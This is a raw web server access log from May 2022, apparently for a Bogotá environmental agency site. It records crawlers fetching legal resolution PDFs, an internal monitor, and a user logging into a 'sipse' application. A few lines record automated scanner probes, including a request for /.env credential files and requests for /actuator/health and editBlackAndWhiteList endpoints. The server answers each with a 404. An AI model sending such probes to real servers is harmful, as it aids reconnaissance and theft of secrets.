157.55.39.8 - - [28/May/2022:03:34:11 -0500] "GET /bla/resoluciones/autos%202008/1358.pdf HTTP/1.1" 200 84651
157.55.39.43 - - [28/May/2022:03:34:53 -0500] "GET /bla/resoluciones/resoluciones%202012/0773.pdf HTTP/1.1" 200 168479
66.249.73.5 - - [28/May/2022:03:35:48 -0500] "GET /para-prevenir-riesgo-sobre-la-ciudadania-distrito-intervendra-eucalipto-de-gran-porte-en-usaquen.html HTTP/1.1" 200 841
157.55.39.43 - - [28/May/2022:03:35:53 -0500] "GET /bla/resoluciones/resoluciones%202012/1033.pdf HTTP/1.1" 200 640565
216.245.221.92 - - [28/May/2022:03:36:53 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/May/2022:03:35:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
207.46.13.179 - - [28/May/2022:03:37:59 -0500] "GET /galeria/galeria/fotos/1GuaymaralTorcaG1.jpg HTTP/1.1" 200 36592
172.22.2.4 - - [28/May/2022:03:36:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
69.63.189.118 - - [28/May/2022:03:40:14 -0500] "GET /images/dia-rio-bogota-12-mayo.jpg HTTP/1.1" 200 44387
69.171.251.120 - - [28/May/2022:03:40:18 -0500] "GET /images/Brasil1.jpeg HTTP/1.1" 200 27965
69.171.251.14 - - [28/May/2022:03:40:19 -0500] "GET /images/RCD1.jpg HTTP/1.1" 200 195843
69.171.251.118 - - [28/May/2022:03:40:19 -0500] "GET /images/feria-servicios-5-MAYO.jpg HTTP/1.1" 200 39759
216.245.221.92 - - [28/May/2022:03:41:53 -0500] "HEAD / HTTP/1.1" 200 -
66.249.65.13 - - [28/May/2022:03:41:57 -0500] "-" 408 -
201.245.192.253 - - [28/May/2022:03:41:41 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46760
201.245.192.253 - - [28/May/2022:03:42:31 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44105
172.22.2.4 - - [28/May/2022:03:41:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [28/May/2022:03:42:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
157.55.39.15 - - [28/May/2022:03:46:00 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [28/May/2022:03:46:54 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/May/2022:03:47:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [28/May/2022:03:48:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53831
178.79.169.18 - - [28/May/2022:03:50:16 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [28/May/2022:03:51:54 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/May/2022:03:53:17 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [28/May/2022:03:54:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
79.110.73.240 - - [28/May/2022:03:56:22 -0500] "GET /bla/resoluciones/resoluciones%202012/1297.pdf HTTP/1.1" 200 3603211
216.245.221.92 - - [28/May/2022:03:56:53 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/May/2022:03:59:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [28/May/2022:03:59:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59646
216.245.221.92 - - [28/May/2022:04:01:54 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.102 - - [28/May/2022:04:05:28 -0500] "-" 408 -
172.22.2.4 - - [28/May/2022:04:04:57 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [28/May/2022:04:06:54 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/May/2022:04:05:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
207.46.13.146 - - [28/May/2022:04:10:54 -0500] "GET /BLA/resoluciones/AUTOS%202020/4221.pdf HTTP/1.1" 304 -
216.245.221.92 - - [28/May/2022:04:11:54 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/May/2022:04:10:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [28/May/2022:04:11:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56776
157.55.39.127 - - [28/May/2022:04:15:10 -0500] "GET /bla/resoluciones/resoluciones%202018/4259.pdf HTTP/1.1" 200 2639010
157.55.39.127 - - [28/May/2022:04:15:50 -0500] "GET /bla/resoluciones/resoluciones%202012/0985.pdf HTTP/1.1" 200 811042
66.249.65.17 - - [28/May/2022:04:15:52 -0500] "-" 408 -
216.245.221.92 - - [28/May/2022:04:16:53 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.15 - - [28/May/2022:04:18:14 -0500] "GET /bla/resoluciones/resoluciones%202012/1770.pdf HTTP/1.1" 200 1199300
172.22.2.4 - - [28/May/2022:04:16:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [28/May/2022:04:17:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
172.22.2.4 - - [28/May/2022:04:19:14 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2013%20del%2006%20de%20Septiembre%20de%202012.pdf HTTP/1.1" 200 351421
157.55.39.8 - - [28/May/2022:04:21:26 -0500] "GET /bla/resoluciones/resoluciones%202012/1283.pdf HTTP/1.1" 200 943626
216.245.221.92 - - [28/May/2022:04:21:53 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/May/2022:04:21:41 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46778
157.55.39.15 - - [28/May/2022:04:23:04 -0500] "GET /bla/resoluciones/resoluciones%202012/0892.pdf HTTP/1.1" 200 534904
44.204.188.139 - - [28/May/2022:04:23:20 -0500] "HEAD /para-prevenir-riesgo-sobre-la-ciudadania-distrito-intervendra-eucalipto-de-gran-porte-en-usaquen.html HTTP/1.1" 200 -
201.245.192.253 - - [28/May/2022:04:22:31 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44110
172.22.2.4 - - [28/May/2022:04:23:46 -0500] "GET /BLA/boletinlegal/xmlrpc.php HTTP/1.1" 404 1038
172.22.2.4 - - [28/May/2022:04:22:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
157.55.39.15 - - [28/May/2022:04:24:44 -0500] "GET /catalogoisis/imagenes/br3c3.gif HTTP/1.1" 200 186
172.22.2.4 - - [28/May/2022:04:23:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
157.55.39.43 - - [28/May/2022:04:26:17 -0500] "GET /bla/resoluciones/resoluciones%202012/0636.pdf HTTP/1.1" 200 541211
216.245.221.92 - - [28/May/2022:04:26:53 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/May/2022:04:28:17 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [28/May/2022:04:29:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
216.245.221.92 - - [28/May/2022:04:31:54 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/May/2022:04:31:41 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46778
201.245.192.253 - - [28/May/2022:04:32:33 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44110
157.55.39.43 - - [28/May/2022:04:33:48 -0500] "GET /bla/resoluciones/resoluciones%202012/1465.pdf HTTP/1.1" 200 1122371
173.252.79.120 - - [28/May/2022:04:35:45 -0500] "GET /images/facebook-live-ivc-MAYO27.png HTTP/1.1" 200 480404
172.22.2.4 - - [28/May/2022:04:34:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
157.55.39.127 - - [28/May/2022:04:36:12 -0500] "GET /BLA/resoluciones/AUTOS%202018/1055.pdf HTTP/1.1" 304 -
172.22.2.4 - - [28/May/2022:04:34:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60973
216.245.221.92 - - [28/May/2022:04:36:53 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.127 - - [28/May/2022:04:39:52 -0500] "GET /bla/resoluciones/resoluciones%202022/1172.pdf HTTP/1.1" 200 399318
104.223.119.104 - - [28/May/2022:04:41:18 -0500] "GET /.env HTTP/1.1" 404 1018
104.223.119.104 - - [28/May/2022:04:41:19 -0500] "POST / HTTP/1.1" 200 319
172.22.2.4 - - [28/May/2022:04:39:57 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [28/May/2022:04:41:54 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.134 - - [28/May/2022:04:42:24 -0500] "GET /portaldeninos/wp-content/uploads/2021/11/flores-humedales-bogota-18-mayo-1200x480.jpg HTTP/1.1" 200 57593
172.22.2.4 - - [28/May/2022:04:40:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57156
201.245.192.253 - - [28/May/2022:04:41:41 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46778
201.245.192.253 - - [28/May/2022:04:42:33 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44110
207.46.13.179 - - [28/May/2022:04:45:47 -0500] "GET /bla/resoluciones/resoluciones%202012/1551.pdf HTTP/1.1" 200 1265569
216.245.221.92 - - [28/May/2022:04:46:54 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/May/2022:04:45:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
207.46.13.179 - - [28/May/2022:04:47:47 -0500] "GET /bla/resoluciones/resoluciones%202012/0343.pdf HTTP/1.1" 200 301349
157.55.39.15 - - [28/May/2022:04:48:06 -0500] "GET /Publicaciones/2022EE78988.pdf HTTP/1.1" 404 227
172.22.2.4 - - [28/May/2022:04:46:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60973
157.55.39.8 - - [28/May/2022:04:48:18 -0500] "GET /bla/resoluciones/resoluciones%202012/0751.pdf HTTP/1.1" 200 250687
40.77.167.102 - - [28/May/2022:04:49:29 -0500] "-" 408 -
157.55.39.127 - - [28/May/2022:04:51:34 -0500] "GET /bla/resoluciones/resoluciones%202012/1016.pdf HTTP/1.1" 200 402060
216.245.221.92 - - [28/May/2022:04:51:53 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/May/2022:04:51:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [28/May/2022:04:52:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60973
207.46.13.146 - - [28/May/2022:04:54:57 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/2027.pdf HTTP/1.1" 304 -
35.204.234.40 - - [28/May/2022:04:55:17 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [28/May/2022:04:56:12 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/CUADRO%20SENTENCIA%20T-299%20DE%202008.doc HTTP/1.1" 200 40960
157.90.181.147 - - [28/May/2022:04:56:25 -0500] "-" 408 -
207.46.13.179 - - [28/May/2022:04:56:46 -0500] "GET /Publicaciones/2022EE85913.pdf HTTP/1.1" 404 227
157.55.39.15 - - [28/May/2022:04:56:48 -0500] "GET /bla/resoluciones/autos%202015/1052.pdf HTTP/1.1" 200 2210866
216.245.221.92 - - [28/May/2022:04:56:53 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/May/2022:04:57:02 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/analisis%20sentencia%20C-596-10.doc HTTP/1.1" 200 36352
157.55.39.15 - - [28/May/2022:04:57:07 -0500] "GET /bla/resoluciones/autos%202015/1052.pdf HTTP/1.1" 200 2210866
172.22.2.4 - - [28/May/2022:04:57:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [28/May/2022:04:58:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
216.245.221.92 - - [28/May/2022:05:01:54 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.43 - - [28/May/2022:05:02:21 -0500] "GET /bla/resoluciones/resoluciones%202012/0579.pdf HTTP/1.1" 200 218789
172.22.2.4 - - [28/May/2022:05:03:17 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [28/May/2022:05:04:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58029
207.46.13.179 - - [28/May/2022:05:05:58 -0500] "GET /bla/resoluciones/resoluciones%202012/1355.pdf HTTP/1.1" 200 291015
216.245.221.92 - - [28/May/2022:05:06:53 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/May/2022:05:09:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
207.46.13.179 - - [28/May/2022:05:10:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%20701%20AL%20800/RESOLUCION%200705%20DE%202007.pdf HTTP/1.1" 304 -
172.22.2.4 - - [28/May/2022:05:09:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
216.245.221.92 - - [28/May/2022:05:11:53 -0500] "HEAD / HTTP/1.1" 200 -
192.241.220.203 - - [28/May/2022:05:14:37 -0500] "GET /actuator/health HTTP/1.1" 404 1018
157.55.39.8 - - [28/May/2022:05:14:51 -0500] "GET /bla/resoluciones/resoluciones%202012/0714.pdf HTTP/1.1" 200 283300
172.22.2.4 - - [28/May/2022:05:14:57 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.65.15 - - [28/May/2022:05:16:43 -0500] "-" 408 -
216.245.221.92 - - [28/May/2022:05:16:53 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/May/2022:05:15:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
45.140.189.120 - - [28/May/2022:05:19:08 -0500] "GET / HTTP/1.1" 200 319
157.55.39.15 - - [28/May/2022:05:19:09 -0500] "GET /bla/resoluciones/resoluciones%202012/1816.pdf HTTP/1.1" 200 458718
207.46.13.146 - - [28/May/2022:05:19:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0699.pdf HTTP/1.1" 304 -
173.252.95.116 - - [28/May/2022:05:20:00 -0500] "GET /conoce-los-requisitos-ambientales-para-abrir-un-establecimiento-comercial-en-bogota.html HTTP/1.1" 206 796
216.245.221.92 - - [28/May/2022:05:21:53 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/May/2022:05:20:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [28/May/2022:05:21:41 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46792
172.22.2.4 - - [28/May/2022:05:21:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 36811
172.22.2.4 - - [28/May/2022:05:21:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52204
201.245.192.253 - - [28/May/2022:05:22:31 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44113
216.245.221.92 - - [28/May/2022:05:26:53 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.179 - - [28/May/2022:05:27:41 -0500] "GET /bla/resoluciones/resoluciones%202012/0894.pdf HTTP/1.1" 200 466149
172.22.2.4 - - [28/May/2022:05:26:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [28/May/2022:05:27:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57156
216.245.221.92 - - [28/May/2022:05:31:53 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/May/2022:05:31:41 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46792
201.245.192.253 - - [28/May/2022:05:32:29 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44113
157.55.39.15 - - [28/May/2022:05:33:21 -0500] "GET /bla/resoluciones/resoluciones%202012/1010.pdf HTTP/1.1" 200 631465
157.55.39.15 - - [28/May/2022:05:33:51 -0500] "GET /bla/resoluciones/resoluciones%202012/0507.pdf HTTP/1.1" 200 424571
172.22.2.4 - - [28/May/2022:05:32:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [28/May/2022:05:33:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60973
157.55.39.15 - - [28/May/2022:05:35:31 -0500] "GET /bla/resoluciones/resoluciones%202012/1735.pdf HTTP/1.1" 200 659925
216.245.221.92 - - [28/May/2022:05:36:53 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.15 - - [28/May/2022:05:38:32 -0500] "GET /bla/resoluciones/resoluciones%202012/1899.pdf HTTP/1.1" 200 2367437
172.22.2.4 - - [28/May/2022:05:38:17 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [28/May/2022:05:39:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
157.55.39.43 - - [28/May/2022:05:40:54 -0500] "GET /Publicaciones/2022EE83638.pdf HTTP/1.1" 404 227
216.245.221.92 - - [28/May/2022:05:41:53 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/May/2022:05:41:41 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46792
201.245.192.253 - - [28/May/2022:05:42:31 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44113
157.55.39.43 - - [28/May/2022:05:43:45 -0500] "GET /bla/resoluciones/resoluciones%202012/1906.pdf HTTP/1.1" 200 5258646
176.58.123.185 - - [28/May/2022:05:44:34 -0500] "GET /portaldeninos/ HTTP/1.1" 200 109662
172.22.2.4 - - [28/May/2022:05:44:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
157.55.39.43 - - [28/May/2022:05:46:35 -0500] "GET /bla/resoluciones/resoluciones%202012/1800.pdf HTTP/1.1" 200 1391719
172.22.2.4 - - [28/May/2022:05:44:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
216.245.221.92 - - [28/May/2022:05:46:53 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.15 - - [28/May/2022:05:48:32 -0500] "GET /bla/resoluciones/resoluciones%202017/1850.pdf HTTP/1.1" 200 396657
157.55.39.43 - - [28/May/2022:05:48:35 -0500] "GET /bla/resoluciones/resoluciones%202012/0640.pdf HTTP/1.1" 200 826093
173.252.107.117 - - [28/May/2022:05:50:42 -0500] "GET /images/pieza-ruta-verde-2-marzo.jpg HTTP/1.1" 200 46716
172.22.2.4 - - [28/May/2022:05:49:57 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [28/May/2022:05:51:53 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/May/2022:05:50:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60973
107.21.132.156 - - [28/May/2022:05:52:32 -0500] "GET /indicadores-de-fauna-silvestre-en-el-observatorio-ambiental-de-bogota.html HTTP/1.1" 200 949
54.82.81.21 - - [28/May/2022:05:52:32 -0500] "GET /secretaria-de-ambiente-y-sena-abren-curso-de-jardines-verticales.html HTTP/1.1" 200 734
157.55.39.8 - - [28/May/2022:05:54:14 -0500] "GET /Publicaciones/2022EE28110.pdf HTTP/1.1" 404 227
216.245.221.92 - - [28/May/2022:05:56:53 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/May/2022:05:55:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [28/May/2022:05:56:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
216.245.221.92 - - [28/May/2022:06:01:53 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/May/2022:06:01:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [28/May/2022:06:02:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
173.252.95.16 - - [28/May/2022:06:04:14 -0500] "GET /secretaria-de-ambiente-y-sena-abren-curso-de-jardines-verticales.html?fbclid=IwAR0HIbYmbWGmerGcg7qsWfwA9Mvlpem00_P1E8mw8n51mgGMnuBpnH6cEo0 HTTP/1.1" 200 734
172.22.2.4 - - [28/May/2022:06:04:51 -0500] "GET /BLA/boletinlegal/Directivas/2015/Directiva%20No.%2001%20del%2014%20de%20Enero%20de%202015.pdf HTTP/1.1" 304 -
216.245.221.92 - - [28/May/2022:06:06:53 -0500] "HEAD / HTTP/1.1" 200 -
173.252.127.18 - - [28/May/2022:06:07:52 -0500] "GET /proyecto-de-eficiencia-energetica-y-energia-solar-para-entidades-publicas-de-bogota-recibira-apoyo-de-c40.html HTTP/1.1" 206 890
207.46.13.179 - - [28/May/2022:06:08:45 -0500] "GET /bla/resoluciones/resoluciones%202012/0434.pdf HTTP/1.1" 200 412578
172.22.2.4 - - [28/May/2022:06:07:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [28/May/2022:06:08:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
216.245.221.92 - - [28/May/2022:06:11:53 -0500] "HEAD / HTTP/1.1" 200 -
45.166.190.193 - - [28/May/2022:06:11:54 -0500] "POST /editBlackAndWhiteList HTTP/1.1" 404 1018
207.46.13.179 - - [28/May/2022:06:11:15 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 63427
207.46.13.179 - - [28/May/2022:06:13:05 -0500] "GET /bla/resoluciones/resoluciones%202012/1767.pdf HTTP/1.1" 200 1075414
172.22.2.4 - - [28/May/2022:06:13:17 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [28/May/2022:06:14:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60973
173.252.95.2 - - [28/May/2022:06:15:48 -0500] "GET /images/la-vieja-mayo-24.jpg HTTP/1.1" 200 58217
37.0.8.69 - - [28/May/2022:06:16:43 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [28/May/2022:06:16:53 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/May/2022:06:18:56 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/solicitudProcesoOtrosPagos.xhtml HTTP/1.1" 302 -
201.245.192.253 - - [28/May/2022:06:18:56 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
201.245.192.253 - - [28/May/2022:06:18:56 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
201.245.192.253 - - [28/May/2022:06:19:01 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/solicitudProcesoOtrosPagos.xhtml HTTP/1.1" 302 -
201.245.192.253 - - [28/May/2022:06:19:01 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
157.55.39.8 - - [28/May/2022:06:19:06 -0500] "GET /galeria/galeria/fotos/Humedal-Tibanica4G.jpg HTTP/1.1" 200 442374
201.245.192.253 - - [28/May/2022:06:19:11 -0500] "GET /sipse/ HTTP/1.1" 302 -
201.245.192.253 - - [28/May/2022:06:19:11 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12170
201.245.192.253 - - [28/May/2022:06:19:11 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 304 -
201.245.192.253 - - [28/May/2022:06:19:11 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 304 -
201.245.192.253 - - [28/May/2022:06:19:11 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 304 -
201.245.192.253 - - [28/May/2022:06:19:11 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [28/May/2022:06:19:11 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 304 -
201.245.192.253 - - [28/May/2022:06:19:11 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/May/2022:06:19:11 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/May/2022:06:19:11 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/May/2022:06:19:12 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/May/2022:06:19:12 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/May/2022:06:19:12 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/May/2022:06:19:12 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 304 -
201.245.192.253 - - [28/May/2022:06:19:12 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 304 -
201.245.192.253 - - [28/May/2022:06:19:12 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
201.245.192.253 - - [28/May/2022:06:19:12 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
201.245.192.253 - - [28/May/2022:06:19:12 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [28/May/2022:06:19:12 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12170
201.245.192.253 - - [28/May/2022:06:19:12 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [28/May/2022:06:19:12 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/May/2022:06:19:12 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/May/2022:06:19:12 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/May/2022:06:19:12 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/May/2022:06:19:12 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/May/2022:06:19:12 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/May/2022:06:19:15 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 15457
201.245.192.253 - - [28/May/2022:06:19:15 -0500] "GET /sipse/css/custom_css_sg_prime.css HTTP/1.1" 304 -
201.245.192.253 - - [28/May/2022:06:19:15 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/May/2022:06:19:15 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [28/May/2022:06:19:15 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/May/2022:06:19:15 -0500] "GET /sipse/js/jquery.min.js HTTP/1.1" 304 -
201.245.192.253 - - [28/May/2022:06:19:15 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/May/2022:06:19:15 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/May/2022:06:19:15 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/May/2022:06:19:15 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/May/2022:06:19:15 -0500] "GET /sipse/imagenes/cargando.gif HTTP/1.1" 304 -
201.245.192.253 - - [28/May/2022:06:19:15 -0500] "GET /sipse/imagenes/logoAplicacion.jpg HTTP/1.1" 304 -
201.245.192.253 - - [28/May/2022:06:19:15 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
201.245.192.253 - - [28/May/2022:06:19:15 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
